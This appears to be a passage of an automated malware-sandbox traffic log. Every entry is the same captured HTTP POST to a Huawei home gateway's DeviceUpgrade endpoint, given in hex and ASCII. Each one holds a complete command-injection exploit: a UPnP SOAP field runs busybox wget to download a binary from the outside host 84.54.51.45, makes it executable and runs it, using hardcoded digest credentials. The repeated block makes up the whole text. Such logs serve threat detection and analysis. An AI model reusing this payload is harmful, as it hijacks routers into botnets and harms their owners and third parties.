63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 450Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 450Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 450Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 450Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 450Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 450Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 450Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 450Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 450Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
